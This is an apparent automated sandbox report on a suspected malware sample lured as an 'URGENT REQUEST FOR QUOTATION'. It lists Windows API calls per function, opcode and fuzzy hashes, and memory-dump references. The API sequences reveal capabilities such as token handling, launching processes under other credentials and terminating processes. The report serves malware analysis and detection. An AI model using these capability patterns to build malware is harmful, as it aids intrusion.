                                                                                                                      • Instruction ID: e5a5d98775eef7b89711e8b605d24676225dbd06c237bf0208f07ba436b9074d
                                                                                                                      • Opcode Fuzzy Hash: 11d8a5310a7f05e56625cc3c43a21c314ea10876a7d794dc0087e6a222b57207
                                                                                                                      • Instruction Fuzzy Hash: EBD173756087019FC714DF64C880A6ABBE5FF8A712F14885DF8899B362DB31EC45CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00090FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00090FCA
                                                                                                                        • Part of subcall function 00090FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00090FD6
                                                                                                                        • Part of subcall function 00090FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00090FE5
                                                                                                                        • Part of subcall function 00090FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00090FEC
                                                                                                                        • Part of subcall function 00090FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00091002
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00091335), ref: 000917AE
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000917BA
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 000917C1
                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 000917DA
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00091335), ref: 000917EE
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000917F5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3008561057-0
                                                                                                                      • Opcode ID: ce6b420bc5b2197d253a9f286765d9465857605c13af4b8b7097f30153f19abe
                                                                                                                      • Instruction ID: 571de6aa6e5702d74064996e85e3836c0b7797af20140c2c6ee086486bb4977c
                                                                                                                      • Opcode Fuzzy Hash: ce6b420bc5b2197d253a9f286765d9465857605c13af4b8b7097f30153f19abe
                                                                                                                      • Instruction Fuzzy Hash: 57119A32604206EFEF109FA5CC49FEEBBB9EB42355F144058F84597220C739A940EB60
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000914FF
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00091506
                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00091515
                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00091520
                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0009154F
                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00091563
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1413079979-0
                                                                                                                      • Opcode ID: ebd549cd64be38eda69fdd15b5c56242c558374d07258c81bdb7fec0affbd9d5
                                                                                                                      • Instruction ID: e0e0519a718c4bcd2fdf7093feaa0ee62edd3b42f16e3935530ea7ca74711e36
                                                                                                                      • Opcode Fuzzy Hash: ebd549cd64be38eda69fdd15b5c56242c558374d07258c81bdb7fec0affbd9d5
                                                                                                                      • Instruction Fuzzy Hash: 8D11297260024AEBEF118F98ED49FDE7BA9FF48744F154115FA09A2060C375CE61EB60
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,00053379,00052FE5), ref: 00053390
                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0005339E
                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000533B7
                                                                                                                      • SetLastError.KERNEL32(00000000,?,00053379,00052FE5), ref: 00053409
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3852720340-0
                                                                                                                      • Opcode ID: 778434e4e4f06dd8d2eb4f22cf8adf9d19768b67d9a1dba9bbd97dfec62c4c4a
                                                                                                                      • Instruction ID: cea13594802ff829677e8b4cf21a98ea1902eabdaf47cef0922292eaa048adc5
                                                                                                                      • Opcode Fuzzy Hash: 778434e4e4f06dd8d2eb4f22cf8adf9d19768b67d9a1dba9bbd97dfec62c4c4a
                                                                                                                      • Instruction Fuzzy Hash: 7801F532609315AEF72527747D8ADA72A94DB053FB320422DFD10851F1EF154E0AA548
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • _______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{, xrefs: 00063FC6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                      • String ID: _______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{
                                                                                                                      • API String ID: 1036877536-3308908821
                                                                                                                      • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                      • Instruction ID: d033aea51e7e04d3241804d7816bbfec13995e4c33488cb190921af96bb62b20
                                                                                                                      • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                      • Instruction Fuzzy Hash: 84A15A71E007969FEB25CF28C8917AEBBF6EF66350F14416DE5959B282C2388D81C790
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,00065686,00073CD6,?,00000000,?,00065B6A,?,?,?,?,?,0005E6D1,?,000F8A48), ref: 00062D78
                                                                                                                      • _free.LIBCMT ref: 00062DAB
                                                                                                                      • _free.LIBCMT ref: 00062DD3
                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,0005E6D1,?,000F8A48,00000010,00034F4A,?,?,00000000,00073CD6), ref: 00062DE0
                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,0005E6D1,?,000F8A48,00000010,00034F4A,?,?,00000000,00073CD6), ref: 00062DEC
                                                                                                                      • _abort.LIBCMT ref: 00062DF2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3160817290-0
                                                                                                                      • Opcode ID: 2282c2565904126f52081f1394e107401100f97ae3c2cb21470c05c1411c1111
                                                                                                                      • Instruction ID: d2e89997e129d24fcf63bf3b3af217df9c8b94417d26b27c0d4dbfc57664b319
                                                                                                                      • Opcode Fuzzy Hash: 2282c2565904126f52081f1394e107401100f97ae3c2cb21470c05c1411c1111
                                                                                                                      • Instruction Fuzzy Hash: D9F0C831A05E0127E2622734BC16EAE259BAFC27A1F260418F928961D3EF2889015270
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00049639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                                                                                                        • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496A2
                                                                                                                        • Part of subcall function 00049639: BeginPath.GDI32(?), ref: 000496B9
                                                                                                                        • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496E2
                                                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 000C8A4E
                                                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 000C8A62
                                                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 000C8A70
                                                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 000C8A80
                                                                                                                      • EndPath.GDI32(?), ref: 000C8A90
                                                                                                                      • StrokePath.GDI32(?), ref: 000C8AA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 43455801-0
                                                                                                                      • Opcode ID: 6c45bd2f41d66901de25dfc1eede3655f0d6fd0f654db478d29bc16650242590
                                                                                                                      • Instruction ID: 37bc52b5127a5d8e3340a82d4ea5b1a9e91207618819996dcb33d18f6d579dd7
                                                                                                                      • Opcode Fuzzy Hash: 6c45bd2f41d66901de25dfc1eede3655f0d6fd0f654db478d29bc16650242590
                                                                                                                      • Instruction Fuzzy Hash: 38110576400108FFEB129F90DC88EAA7FACEB08354F048426FA599A1A1C7759D95DFA0
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 00095218
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00095229
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00095230
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00095238
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0009524F
                                                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00095261
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1035833867-0
                                                                                                                      • Opcode ID: 58386c49cd1928ab9c6fe79766913985956c79141d07f3ab96a990cef36f62f0
                                                                                                                      • Instruction ID: edf96cbd0c39c1b155ecddcd1aa4c1bfda6ab6dc44ba9fe89e4bc84296aea43d
                                                                                                                      • Opcode Fuzzy Hash: 58386c49cd1928ab9c6fe79766913985956c79141d07f3ab96a990cef36f62f0
                                                                                                                      • Instruction Fuzzy Hash: BE018475A01704BBFF105BA6DC49E5EBFB8FF44351F044065FA08A7291D6709800CB60
                                                                                                                      APIs
                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00031BF4
                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00031BFC
                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00031C07
                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00031C12
                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00031C1A
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00031C22
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278518827-0
                                                                                                                      • Opcode ID: a9f242545921ae80d2b34ba0c21787a4405b1a36686a66d0a18deddde3371c08
                                                                                                                      • Instruction ID: c994b5c1d497d3badb4c738d8099a54303410683415b32105acff3db0e0d8823
                                                                                                                      • Opcode Fuzzy Hash: a9f242545921ae80d2b34ba0c21787a4405b1a36686a66d0a18deddde3371c08
                                                                                                                      • Instruction Fuzzy Hash: 5A0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C4BA42C7F5A864CBE5
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0009EB30
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0009EB46
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0009EB55
                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB64
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB6E
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB75
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 839392675-0
                                                                                                                      • Opcode ID: 62333c02c6702ca1f5b4d46bd6110d6e573db820fbb1e590ad075e1d1413b195
                                                                                                                      • Instruction ID: 71825f32cf350f8b7d3d547511659a5db09fbaa9b29554a8494b1c13ba8944ae
                                                                                                                      • Opcode Fuzzy Hash: 62333c02c6702ca1f5b4d46bd6110d6e573db820fbb1e590ad075e1d1413b195
                                                                                                                      • Instruction Fuzzy Hash: 7EF01772640158BBF7215B62DD0EEAB3A7CEBCAB15F000158FA05D109197A85A0186B5
                                                                                                                      APIs
                                                                                                                      • GetClientRect.USER32(?), ref: 00087452
                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00087469
                                                                                                                      • GetWindowDC.USER32(?), ref: 00087475
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00087484
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00087496
                                                                                                                      • GetSysColor.USER32(00000005), ref: 000874B0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 272304278-0
                                                                                                                      • Opcode ID: 7d608743df47ba7620da86117da3cdd53f12d0eea6d2686c326672f6d2d8b28e
                                                                                                                      • Instruction ID: 6f45634a6fb610d7caa3f9d0d4593984f6dc47b25b5cf0a9e167fa47ee43c963
                                                                                                                      • Opcode Fuzzy Hash: 7d608743df47ba7620da86117da3cdd53f12d0eea6d2686c326672f6d2d8b28e
                                                                                                                      • Instruction Fuzzy Hash: FA018B31400615EFFB50AFA4DC08FAE7BB5FB04321F240064F959A20A1CB355E82AB10
                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0009187F
                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 0009188B
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00091894
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0009189C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 000918A5
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000918AC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 146765662-0
                                                                                                                      • Opcode ID: facb89ec12ab216342231937769491057db082d3d679a02333b643408e72092b
                                                                                                                      • Instruction ID: f036e55c47305fb57bc45ca9b0e81be0344b669963981dadb8502f2afb96e6b0
                                                                                                                      • Opcode Fuzzy Hash: facb89ec12ab216342231937769491057db082d3d679a02333b643408e72092b
                                                                                                                      • Instruction Fuzzy Hash: 9BE01A36404501BFFB015FA2ED0CD0ABF39FF4AB22B108220F62981470CB369420DF50
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0009C6EE
                                                                                                                      • _wcslen.LIBCMT ref: 0009C735
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0009C79C
                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0009C7CA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1227352736-4108050209
                                                                                                                      • Opcode ID: 2ddf38277ee30aead10503a67261333b6475fee538ecf44e0c849dd4a7011b3c
                                                                                                                      • Instruction ID: f4bc7ad02b7b4d24b936be140614355d17619289acdbf9383f24fae1fecd539e
                                                                                                                      • Opcode Fuzzy Hash: 2ddf38277ee30aead10503a67261333b6475fee538ecf44e0c849dd4a7011b3c
                                                                                                                      • Instruction Fuzzy Hash: 66510371A083019BEB509F68C885FABB7E8AF49314F04092DF995D31E1DB74D904EB52
                                                                                                                      APIs
                                                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 000BAEA3
                                                                                                                        • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                                                                                                      • GetProcessId.KERNEL32(00000000), ref: 000BAF38
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BAF67
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                      • String ID: <$@
                                                                                                                      • API String ID: 146682121-1426351568
                                                                                                                      • Opcode ID: 3954b548f430b9b3a0df4baf7558f8721d2dbf1550fdda1f2319f0f7abaf5d6a
                                                                                                                      • Instruction ID: 5c34fd495a52dcafe86060aeff5ac585d7d4828d51d0938e65d4d78c4b78a461
                                                                                                                      • Opcode Fuzzy Hash: 3954b548f430b9b3a0df4baf7558f8721d2dbf1550fdda1f2319f0f7abaf5d6a
                                                                                                                      • Instruction Fuzzy Hash: 46715571A00619DFCB15DF94C484ADEBBF4BF09314F0484A9E85AAB3A2CB74ED45CB91
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00097206
                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0009723C
                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0009724D
                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000972CF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
